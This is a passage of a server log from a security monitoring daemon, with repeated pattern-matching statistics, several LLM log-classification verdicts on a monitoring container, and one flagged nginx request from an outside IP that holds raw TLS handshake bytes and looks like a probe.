llm_errors=1 learned=3 Mar 20 11:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:21:31.943839 [observer] Patterns: hash=4466 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:22:01.986113 [observer] Pipeline: processed=4573 pattern_hits=4470 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:22:01 
ip-172-26-12-110 observer[1565011]: 2026/03/20 11:22:01.990577 [observer] Patterns: hash=4470 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:22:31.943433 [observer] Pipeline: processed=4575 pattern_hits=4472 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:22:31.943464 [observer] Patterns: hash=4472 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:23:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:23:02.067631 [observer] Pipeline: processed=4577 pattern_hits=4474 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:23:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:23:02.067669 [observer] Patterns: hash=4474 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:23:31.936040 [observer] Pipeline: processed=4581 pattern_hits=4478 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:23:31.936071 [observer] Patterns: hash=4478 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:24:01.983456 [observer] Pipeline: processed=4583 pattern_hits=4480 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:24:01.983494 [observer] Patterns: hash=4480 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:24:31.935453 [observer] Pipeline: processed=4589 pattern_hits=4486 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:24:31.935480 [observer] Patterns: hash=4486 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:25:01.947326 [observer] 
Pipeline: processed=4591 pattern_hits=4488 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:25:01.947354 [observer] Patterns: hash=4488 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:25:31.935918 [observer] Pipeline: processed=4594 pattern_hits=4491 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:25:31.935942 [observer] Patterns: hash=4491 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:26:01.957726 [observer] Pipeline: processed=4597 pattern_hits=4494 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:26:01.957752 [observer] Patterns: hash=4494 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:26:31.939715 [observer] Pipeline: processed=4599 pattern_hits=4496 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:26:31.939741 [observer] Patterns: hash=4496 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:27:01.966293 [observer] Pipeline: processed=4603 pattern_hits=4500 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:27:01.966386 [observer] Patterns: hash=4500 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:27:31.945141 [observer] Pipeline: processed=4605 pattern_hits=4502 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:27:31.945185 [observer] Patterns: hash=4502 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 
Mar 20 11:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:28:01.980262 [observer] Pipeline: processed=4609 pattern_hits=4506 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:28:01.982504 [observer] Patterns: hash=4506 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:28:31.943398 [observer] Pipeline: processed=4611 pattern_hits=4508 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:28:31.943426 [observer] Patterns: hash=4508 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:29:01.959678 [observer] Pipeline: processed=4614 pattern_hits=4511 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:29:01.959719 [observer] Patterns: hash=4511 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:29:31.940465 [observer] Pipeline: processed=4619 pattern_hits=4516 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:29:31.940489 [observer] Patterns: hash=4516 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:30:01.946390 [observer] Pipeline: processed=4621 pattern_hits=4518 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:30:01.946504 [observer] Patterns: hash=4518 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:30:31.935447 [observer] Pipeline: processed=4625 pattern_hits=4522 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:30:31.935474 [observer] 
Patterns: hash=4522 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:31:01.951499 [observer] Pipeline: processed=4627 pattern_hits=4524 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:31:01.951541 [observer] Patterns: hash=4524 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:31:31.935628 [observer] Pipeline: processed=4631 pattern_hits=4528 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:31:31.935663 [observer] Patterns: hash=4528 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:32:01.942610 [observer] Pipeline: processed=4633 pattern_hits=4530 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:32:01.942651 [observer] Patterns: hash=4530 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:32:31.935919 [observer] Pipeline: processed=4636 pattern_hits=4533 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:32:31.935944 [observer] Patterns: hash=4533 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:33:01.957751 [observer] Pipeline: processed=4639 pattern_hits=4536 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:33:01.957786 [observer] Patterns: hash=4536 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:33:31.951245 [observer] Pipeline: processed=4641 pattern_hits=4538 llm_calls=103 llm_errors=1 learned=3 
Mar 20 11:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:33:31.951274 [observer] Patterns: hash=4538 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:34:01.942026 [observer] Pipeline: processed=4645 pattern_hits=4542 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:34:01.942061 [observer] Patterns: hash=4542 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:34:31.935911 [observer] Pipeline: processed=4649 pattern_hits=4546 llm_calls=103 llm_errors=1 learned=3 Mar 20 11:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:34:31.935934 [observer] Patterns: hash=4546 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103 Mar 20 11:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:35:01.952815 [observer] Pipeline: processed=4654 pattern_hits=4550 llm_calls=104 llm_errors=1 learned=3 Mar 20 11:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:35:01.952853 [observer] Patterns: hash=4550 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=104 Mar 20 11:35:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:35:06.242478 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 20 11:35:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:35:06.242525 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern Mar 20 11:35:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:35:14.654212 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.65 action=allow pattern_type=prefix Mar 20 11:35:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:35:14.654257 [analyzer] Source hint mismatch: LLM says "docker", actual is 
"captain-netdata-container" — skipping pattern Mar 20 11:35:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:35:21.035203 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.68 action=allow pattern_type=prefix Mar 20 11:35:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:35:21.035244 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern Mar 20 11:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:35:31.943555 [observer] Pipeline: processed=4658 pattern_hits=4552 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:35:31.943579 [observer] Patterns: hash=4552 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:36:01.940561 [observer] Pipeline: processed=4661 pattern_hits=4555 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:36:01.940592 [observer] Patterns: hash=4555 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:36:31.939959 [observer] Pipeline: processed=4664 pattern_hits=4558 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:36:31.939986 [observer] Patterns: hash=4558 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:37:01.956929 [observer] Pipeline: processed=4666 pattern_hits=4560 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:37:01.956970 [observer] Patterns: hash=4560 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:37:31.934557 [observer] Pipeline: processed=4670 pattern_hits=4564 llm_calls=106 
llm_errors=1 learned=3 Mar 20 11:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:37:31.934581 [observer] Patterns: hash=4564 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:38:01.977665 [observer] Pipeline: processed=4672 pattern_hits=4566 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:38:01.977691 [observer] Patterns: hash=4566 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:38:31.935794 [observer] Pipeline: processed=4676 pattern_hits=4570 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:38:31.935824 [observer] Patterns: hash=4570 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:39:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:39:02.042924 [observer] Pipeline: processed=4678 pattern_hits=4572 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:39:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:39:02.043150 [observer] Patterns: hash=4572 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:39:31.934238 [observer] Pipeline: processed=4681 pattern_hits=4575 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:39:31.934263 [observer] Patterns: hash=4575 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:40:01.938525 [observer] Pipeline: processed=4686 pattern_hits=4580 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:40:01.938551 [observer] Patterns: hash=4580 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:40:31 ip-172-26-12-110 observer[1565011]: 
2026/03/20 11:40:31.950385 [observer] Pipeline: processed=4688 pattern_hits=4582 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:40:31.950417 [observer] Patterns: hash=4582 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:41:01.937546 [observer] Pipeline: processed=4692 pattern_hits=4586 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:41:01.937573 [observer] Patterns: hash=4586 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:41:31.943695 [observer] Pipeline: processed=4694 pattern_hits=4588 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:41:31.943733 [observer] Patterns: hash=4588 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:42:01.942048 [observer] Pipeline: processed=4698 pattern_hits=4592 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:42:01.942084 [observer] Patterns: hash=4592 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:42:31.935614 [observer] Pipeline: processed=4700 pattern_hits=4594 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:42:31.935651 [observer] Patterns: hash=4594 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:43:01.967372 [observer] Pipeline: processed=4703 pattern_hits=4597 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:43:01.967407 [observer] Patterns: hash=4597 prefix=0 regex=0 contains=0 
deny=21 alert=302 suppress=0 misses=106 Mar 20 11:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:43:31.934288 [observer] Pipeline: processed=4706 pattern_hits=4600 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:43:31.934310 [observer] Patterns: hash=4600 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:44:01.976126 [observer] Pipeline: processed=4708 pattern_hits=4602 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:44:01.976155 [observer] Patterns: hash=4602 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:44:31.935253 [observer] Pipeline: processed=4712 pattern_hits=4606 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:44:31.935285 [observer] Patterns: hash=4606 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:45:01.937493 [observer] Pipeline: processed=4716 pattern_hits=4610 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:45:01.937519 [observer] Patterns: hash=4610 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:45:31.935475 [observer] Pipeline: processed=4720 pattern_hits=4614 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:45:31.935505 [observer] Patterns: hash=4614 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:46:02.011188 [observer] Pipeline: processed=4722 pattern_hits=4616 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:46:02 ip-172-26-12-110 
observer[1565011]: 2026/03/20 11:46:02.011226 [observer] Patterns: hash=4616 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:46:31.935565 [observer] Pipeline: processed=4725 pattern_hits=4619 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:46:31.935592 [observer] Patterns: hash=4619 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:47:01.943684 [observer] Pipeline: processed=4729 pattern_hits=4623 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:47:01.943710 [observer] Patterns: hash=4623 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:47:31.950933 [observer] Pipeline: processed=4731 pattern_hits=4625 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:47:31.950969 [observer] Patterns: hash=4625 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:48:01.945672 [observer] Pipeline: processed=4735 pattern_hits=4629 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:48:01.945704 [observer] Patterns: hash=4629 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:48:31.946355 [observer] Pipeline: processed=4737 pattern_hits=4631 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:48:31.946377 [observer] Patterns: hash=4631 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:49:01.960012 [observer] Pipeline: processed=4741 
pattern_hits=4635 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:49:01.960043 [observer] Patterns: hash=4635 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:49:31.943791 [observer] Pipeline: processed=4743 pattern_hits=4637 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:49:31.943819 [observer] Patterns: hash=4637 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106 Mar 20 11:49:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:49:45.831319 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T11:49:45.831024187Z 93.174.93.12 - - [20/Mar/2026:11:49:45 +0000] "_" "\x16\x03\x02\x01o\x01\x00\x01k\x03\x02RH\xC5\x1A#\xF7:N\xDF\xE2\xB4\x82/\xFF\x09T\x9F\xA7\xC4y\xB0h\xC6\x13\x8C\xA4\x1... 
Mar 20 11:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:50:01.944579 [observer] Pipeline: processed=4749 pattern_hits=4643 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:50:01.944610 [observer] Patterns: hash=4643 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 11:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:50:31.935317 [observer] Pipeline: processed=4752 pattern_hits=4646 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:50:31.935340 [observer] Patterns: hash=4646 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 11:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:51:01.985127 [observer] Pipeline: processed=4754 pattern_hits=4648 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:51:01.985258 [observer] Patterns: hash=4648 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 11:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:51:31.937685 [observer] Pipeline: processed=4758 pattern_hits=4652 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:51:31.937714 [observer] Patterns: hash=4652 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 11:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:52:01.960088 [observer] Pipeline: processed=4760 pattern_hits=4654 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:52:01.960197 [observer] Patterns: hash=4654 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 11:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:52:31.934279 [observer] Pipeline: processed=4764 pattern_hits=4658 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:52:31.934303 [observer] 
Patterns: hash=4658 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 11:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:53:01.956932 [observer] Pipeline: processed=4766 pattern_hits=4660 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:53:01.956966 [observer] Patterns: hash=4660 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 11:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:53:31.937751 [observer] Pipeline: processed=4769 pattern_hits=4663 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:53:31.937782 [observer] Patterns: hash=4663 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 11:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:54:01.941736 [observer] Pipeline: processed=4772 pattern_hits=4666 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:54:01.941764 [observer] Patterns: hash=4666 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 11:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:54:31.947770 [observer] Pipeline: processed=4774 pattern_hits=4668 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:54:31.947798 [observer] Patterns: hash=4668 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 11:55:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:55:02.008017 [observer] Pipeline: processed=4780 pattern_hits=4674 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:55:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:55:02.012593 [observer] Patterns: hash=4674 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 11:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:55:31.934345 [observer] Pipeline: processed=4782 pattern_hits=4676 llm_calls=106 llm_errors=1 learned=3 
Mar 20 11:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:55:31.934369 [observer] Patterns: hash=4676 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 11:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:56:01.969842 [observer] Pipeline: processed=4786 pattern_hits=4680 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:56:01.969868 [observer] Patterns: hash=4680 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 11:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:56:31.945065 [observer] Pipeline: processed=4788 pattern_hits=4682 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:56:31.945096 [observer] Patterns: hash=4682 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 11:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:57:01.959833 [observer] Pipeline: processed=4790 pattern_hits=4684 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:57:01.959875 [observer] Patterns: hash=4684 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 11:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:57:31.934111 [observer] Pipeline: processed=4794 pattern_hits=4688 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:57:31 ip-172-26-12-110 observer[1565011]: 